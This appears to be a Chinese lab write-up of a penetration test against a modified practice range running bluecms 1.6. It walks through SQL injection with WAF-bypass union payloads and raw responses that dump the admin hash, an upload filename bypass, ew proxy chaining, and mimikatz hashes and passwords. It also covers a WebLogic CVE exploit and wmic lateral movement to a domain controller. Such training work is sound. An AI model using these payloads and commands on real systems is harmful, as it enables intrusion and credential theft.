实战｜记一次内网靶机渗透测试

1337163122

​ 实战｜记一次内网靶机渗透测试原创 11ccaab [url=]HACK学习呀[/url] 前天
收录于话题
#渗透测试6
#内网渗透12
#渗透2
#后渗透1
靶机环境-魔改的红日6，修改了bluecms源码;

外网Web：192.168.140.131/192.168.111.128

内网Web：192.168.111.80/10.10.10.80

DC：10.10.10.10

0x01 外网web
首先来到外网web：
​
可以看到开放了80访问看看
​
可以看到是bluecms 1.6。这个cms很多漏洞，网上下载一套看看。
1.1 代码审计全文搜索下$_GET
​
来到ad_js.php
​

1. $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
   
2. if(empty($ad_id))
   
3. {
   
4.     echo 'Error!';
   
5.     exit();
   
6. }
   
7. $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
   
8. if($ad['time_set'] == 0)
   
9. {
   
10.     $ad_content = $ad['content'];
    
11. }
    
12. else
    
13. {
    
14.     if($ad['end_time'] < time())
    
15.     {
    
16.         $ad_content = $ad['exp_content'];
    
17.     }
    
18.     else
    
19.     {
    
20.         $ad_content = $ad['content'];
    
21.     }
    
22. }

复制代码

可以看到如果ad_id不为空就删除两边的空白符号，否则输出Error，然后就会执行getone方法，跟踪下getone。

1. function getone($sql, $type=MYSQL_ASSOC){
   
2.         $query = $this->query($sql,$this->linkid);
   
3.         $row = mysql_fetch_array($query, $type);
   
4.         return $row;
   
5.     }

复制代码

​可以看到没有做任何过滤，直接带入了执行了sql语句。
http://192.168.140.131/ad_js.php?ad_id=1 and 1=1
​
可以看到存在waf。
1.2 waf绕过​
​
fuzz下加上/"%!* 来干扰。 绕过order by
ad_js.php?ad_id=1/%//order////by////8
http://192.168.140.131/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8
ad_js.php?ad_id=1/%//order////by////7
​

1. <!--
   
2. document.write("");
   
3. -->

复制代码

​绕过union select
ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7
​
​
全部被拦截，加上/!50001/再来跑
​
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7
返回包：
​

1. HTTP/1.1 200 OK
   
2. Date: Sun, 25 Jul 2021 10:29:14 GMT
   
3. Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
   
4. Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
5. Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
6. Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
7. Content-Length: 33
   
8. Connection: close
   
9. Content-Type: text/html;charset=gb2312
   
10. <!--
    
11. document.write("7");
    
12. -->

复制代码

​获取当前表：正常语句：
union select 1,2,3,4,5,6,group_concat(table_name), from information_schema.tables where table_schema=database()
套用上面的被拦截，逐条测试哪里被拦截了
​

发现只要不存在database()就不会被拦截
同理fuzz括号里面就行 bypass payload：
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(/*%!"/*/
返回包：
​

1. HTTP/1.1 200 OK
   
2. Date: Sun, 25 Jul 2021 10:37:08 GMT
   
3. Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
   
4. Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
5. Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
6. Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
7. Content-Length: 401
   
8. Connection: close
   
9. Content-Type: text/html;charset=gb2312
   
10. <!--
    
11. document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");
    
12. -->

复制代码

​可以看到存在blue_admin表，查看该表存在的字段
正常语句：
union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name='blue_admin'
单引号过滤hex编码下
​

bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E
返回包：
​

1. HTTP/1.1 200 OK
   
2. Date: Sun, 25 Jul 2021 11:03:52 GMT
   
3. Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
   
4. Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
5. Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
6. Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
7. Content-Length: 108
   
8. Connection: close
   
9. Content-Type: text/html;charset=gb2312
   
10. <!--
    
11. document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");
    
12. -->

复制代码

​存在admin_name,pwd

获取账密正常语句套同样的过滤语句：blue_admin:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
返回包:
​

1. HTTP/1.1 200 OK
   
2. Date: Sun, 25 Jul 2021 11:08:14 GMT
   
3. Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
   
4. Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
5. Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
6. Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
7. Content-Length: 37
   
8. Connection: close
   
9. Content-Type: text/html;charset=gb2312
   
10. <!--
    
11. document.write("admin");
    
12. -->

复制代码

​pwd:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(pwd)%20from%20blue_admin
返回包:
​

1. HTTP/1.1 200 OK
   
2. Date: Sun, 25 Jul 2021 11:09:17 GMT
   
3. Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29
   
4. Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
5. Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
6. Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly
   
7. Content-Length: 64
   
8. Connection: close
   
9. Content-Type: text/html;charset=gb2312
   
10. <!--
    
11. document.write("cc03e747a6afbbcbf8be7668acfebee5");
    
12. -->

复制代码

​获得账密:admin/test123
1.3 后台getshell​
这里尝试了文件包含发现不行,发现robots.txt下存在test目录的upload.html文件
​
直接被拦截了
这里我们可以修改
Content-Disposition: form-data; name="file"; filename="t.php"
为
Content-Disposition: form-data; name="file"; filename=; filename="t.php"
来绕过
​
0x02 内网渗透可以看到权限还是挺高的。存在111段
​
上传ew到web靶机
执行
ew.exe -s ssocksd -l 1266

​
​
添加用户上去，mimikatz抓密码
​
aspnet    161cff084477fe596a5db81874498a24(1qaz@WSX)itsec        852a844adfce18f66009b4f14e0a98de(test123..)Administrator    852a844adfce18f66009b4f14e0a98de(test123..)c段发现存在80
​
​

存在administrator用户明文看看能不能直接ipc
​
密码不对。开放了80和7001
80没啥东西7001为weblogic
​
存在CVE-2019-2725
​
拿下内网weblogic
可以看到存在域de1ay.com,拿到了本地管理员权限。
​
存在10.10.10段
​
抓下密码：
​

1. * Username : de1ay
   
2. * Domain   : WEB
   
3. * NTLM     : cb5141dcdaa451b0972f3144fda5b3cd
   
4. * SHA1     : c25aadf268b15742f54e1ca78d54b1da417d5f8d
   
5. * Password : 1qaz@WSX1qaz@WSX
   
6. User : Administrator
   
7. Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0(可能没启用)

复制代码

​设置多层代理 attack ip:192.168.140.1 web:192.168.140.131/192.168.111.128 weblogic:192.168.111.80/10.10.10.80
上传ew到weblogic机器上执行监听本地8888端口：
ew.exe -s ssocksd -l 8888
在攻击机器上执行，把本地端口1080跟web的9999端口绑定：
ew.exe -s lcx_tran -l 1080 -f 192.168.140.131 -g 9999
在web机器上将本地的9999跟weblogic的8888绑定：
ew.exe -s lcx_tran -l 9999 -f 192.168.111.80 -g 8888
​
​
发现存在10机器。
用现有的密码加上域用户尝试爆破
user:
​

1. de1ay\administrator
   
2. de1ay\de1ay

复制代码

pass:

1. 1qaz@WSX
   
2. test123..
   
3. 1qaz@WSX1qaz@WSX

复制代码

​ ​
1.runas获取域用户cmd：
runas /user:de1ay\administrator cmd
​
wmi横向移动：
wmic /node:10.10.10.10 /user:de1ay\administrator /password:1qaz@WSX1qaz@WSX process call create "cmd /c ipconfig > c:\1.txt"
​
​
​